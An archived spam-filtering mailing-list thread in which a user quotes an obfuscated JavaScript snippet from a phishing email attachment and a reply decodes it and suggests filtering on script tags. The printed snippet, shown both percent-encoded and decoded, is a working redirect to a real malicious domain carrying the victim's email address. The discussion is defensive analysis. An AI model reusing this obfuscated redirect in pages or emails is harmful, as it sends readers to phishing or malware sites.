You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@spamassassin.apache.org by Alex <my...@gmail.com> on 2021/06/30 15:28:09 UTC
javascript phish
Hi,
I'm using SA with amavisd and keep receiving emails with image
attachments with random filenames and "Billing - Release.html" that
contains the following javascript. What does it do? How do we block
them, outside of blocking HTML altogether?
<script language="javascript">
document.write(unescape('%3c%2f%64%69%76%3e%0a%3c%70%3e%20%44%65%61%72%2c%20%3c%62%2f%3e%42%69%6c%6c%69%6e%67%3c%2f%62%3e%0a%0a%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%75%66%61%78%2e%77%6f%72%6b%2f%59%6d%6c%73%62%47%6c%75%5a%30%42%7a%62%57%46%79%64%47%31%73%63%79%35%6a%62%32%30%3d%27%3b%22%2c%29%3b%0a%20%3c%2f%73%63%72%69%70%74%3e'));
</script>
Re: javascript phish
Posted by Bill Cole <sa...@billmail.scconsult.com>.
On 2021-06-30 at 11:28:09 UTC-0400 (Wed, 30 Jun 2021 11:28:09 -0400)
Alex <my...@gmail.com>
is rumored to have said:
> Hi,
> I'm using SA with amavisd and keep receiving emails with image
> attachments with random filenames and "Billing - Release.html" that
> contains the following javascript. What does it do? How do we block
> them, outside of blocking HTML altogether?
You could look for script tags in the message. There's no sane reason to
embed scripts in email. Unfortunately, you probably want to NOT reject
messages like this one, which quotes a very sketchy script. It might be
possible to look for '<script' in the rawbody and only act on it if
there is no '<script' in the interpreted body text. Obviously I have not
tried this. Yet.
> <script language="javascript">
> document.write(unescape('%3c%2f%64%69%76%3e%0a%3c%70%3e%20%44%65%61%72%2c%20%3c%62%2f%3e%42%69%6c%6c%69%6e%67%3c%2f%62%3e%0a%0a%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%75%66%61%78%2e%77%6f%72%6b%2f%59%6d%6c%73%62%47%6c%75%5a%30%42%7a%62%57%46%79%64%47%31%73%63%79%35%6a%62%32%30%3d%27%3b%22%2c%29%3b%0a%20%3c%2f%73%63%72%69%70%74%3e'));
> </script>
That says:
document.write(unescape('</div>
<p> Dear, <b/>Billing</b>
<script type="text/JavaScript">
setTimeout("location.href =
'https://ufax.work/YmlsbGluZ0BzbWFydG1scy5jb20=';",);
</script>'));
So the script opens that URL.
The base64 string at the end of the URL decodes to
"billing@smartmls.com"
The URL redirects either to an innocuous Wikipedia page or a very much
NOT innocuous jumbled mess of JavaScript that probably causes an
appropriately vulnerable computer to go on a rampage slaughtering
children and kittens.
--
Bill Cole
bill@scconsult.com or billcole@apache.org
(AKA @grumpybozo and many *@billmail.scconsult.com addresses)
Not Currently Available For Hire